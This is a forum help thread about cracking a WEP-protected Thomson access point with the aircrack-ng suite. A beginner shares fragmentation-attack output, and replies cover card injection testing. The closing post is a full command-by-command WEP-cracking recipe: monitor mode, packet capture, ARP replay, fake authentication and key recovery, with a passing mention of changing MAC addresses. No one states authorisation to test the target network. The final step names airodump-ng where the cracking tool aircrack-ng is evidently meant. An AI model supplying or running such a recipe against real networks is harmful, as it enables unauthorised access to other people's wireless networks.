Results 1 to 5 of 5

Thread: Problems trying to crack WEP w/o no clients

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default Problems trying to crack WEP w/o no clients

    Hello, nice to meet you all. First of all, English is not my native language so excuse my mistakes.

    Well, the problem is that I cannot make this part of the guide from aircrack to work: Step 4 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA

    The previous steps work fine as I can make a fake auth with the AP. The AP is a THOMSON TCW710 the AUTH is on OPN an the key is WEP 64-bits. I wanted to make it easy for starting but I cannot get the chopchop attack to show this:

    Saving chosen packet in replay_src-0203-180328.cap
    Data packet found!
    Sending fragmented packet
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 384 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Trying to get 1500 bytes of a keystream
    Got RELAYED packet!!
    Thats our ARP packet!
    Saving keystream in fragment-0203-180343.xor
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
    As I have read, the chopchop does not work on some APs, but I cannot make the fragmentation attack to work either.

    So am I doing something wrong, or do I have to keep trying until success?
    Thanks folks.

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Problems trying to crack WEP w/o no clients

    You are switching the terms chopchop and fragmentation. What you have there is a successful output of a fragmentation attack. As for your problem, you can try and see if your card is capable of chopchop and frag attacks, but you will need another wireless card. IIRC, the command was "aireplay-ng -9 -i <second device> <device you intend to test>". If the syntax is wrong, "man aireplay-ng" and "aireplay-ng --help" should clarify what's the right command.

  3. #3
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default Re: Problems trying to crack WEP w/o no clients

    Thank you Snayler for the reply, I was aware of the mistake once I reread the guide.

    Can I perform that test with another card on other laptop or do I need to use a second card on the same laptop, and if this is not possible (as of today a don't have another card to attach to the computer) could I use a workaround to try to crack the WEP without the fragmentation or chopchop attack?

  4. #4
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Problems trying to crack WEP w/o no clients

    Quote Originally Posted by elgato View Post
    Can I perform that test with another card on other laptop or do I need to use a second card on the same laptop
    Yes gato, you can do it on another laptop. What matters in this test is the card, not the rest of the setup.

    Quote Originally Posted by elgato View Post
    could I use a workaround to try to crack the WEP without the fragmentation or chopchop attack?
    No, not that I've heard of.

    Quote Originally Posted by elgato View Post
    (as of today a don't have another card to attach to the computer)
    Are you using a USB card or internal wifi card?

    So am I doing something wrong, or do I have to keep trying until success?
    Now that I think of it, you have to make sure the packet you selected came from your AP, or else the attack will not work. Also, some packets, even from the same AP, will result on a failed attack. But if you tried various times, than your problem should be something else.

  5. #5
    mcurran
    Guest

    Default Re: Problems trying to crack WEP w/o no clients

    You don't need a client connected to the AP for WEP cracking, but sometimes a deauth helps launch the aireplay arpreplay attack (-3), unless I'm just imaging that...

    Here's the whole howto for WEP cracking, my preferred method at least:

    airmon-ng start <interface>

    (Notice the new interface created in monitor mode)

    airodump-ng <new interface>

    (Look for target network: Note the channel, BSSID, and maybe ESSID - PWR should be -82 or lower)

    airmon-ng stop <new interface>
    airmon-ng stop <interface>

    iwconfig <interface> channel <same channel as target AP>
    airmon-ng start <interface>
    iwconfig <new interface> channel <same channel as target AP>

    airodump-ng -c <channel> -w <any name file> --bssid <Target AP's BSSID> <new interface>

    [New Terminal]
    aireplay-ng -3 -b <Target AP's BSSID> -h <Your MAC ADDRESS> <new interface>
    [New Terminal]
    aireplay-ng -1 0 -a <Target AP's BSSID> -h <Your MAC ADDRESS> <new interface>

    (Watch the Data column in airodump-ng terminal and start aircrack in a new terminal once it's around 500)

    [New Terminal]
    airodump-ng <same any name file*.cap> --bssid <Target AP's BSSID>

    Whalaa!

    I also use macchanger sometimes, but it's not really any easier or more efficient, just use ifconfig in another terminal to look up your MAC. I don't want any credit for this tutorial, because I'm sure it's printed elsewhere a million times, and I probably learned it from another bt forum member in the past...

Similar Threads

  1. How to crack WPA on a cluster
    By MikeCa in forum BackTrack Howtos
    Replies: 12
    Last Post: 02-04-2011, 02:12 AM
  2. i need info and help on setting up a wpa crack cluster
    By djurban in forum Beginners Forum
    Replies: 1
    Last Post: 01-25-2010, 09:52 PM
  3. WEP Crack Aireplay-ng
    By kiloraw in forum Beginners Forum
    Replies: 3
    Last Post: 01-24-2010, 01:05 AM
  4. WEP Crack Aireplay-ng
    By kiloraw in forum Beginners Forum
    Replies: 4
    Last Post: 01-22-2010, 07:46 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •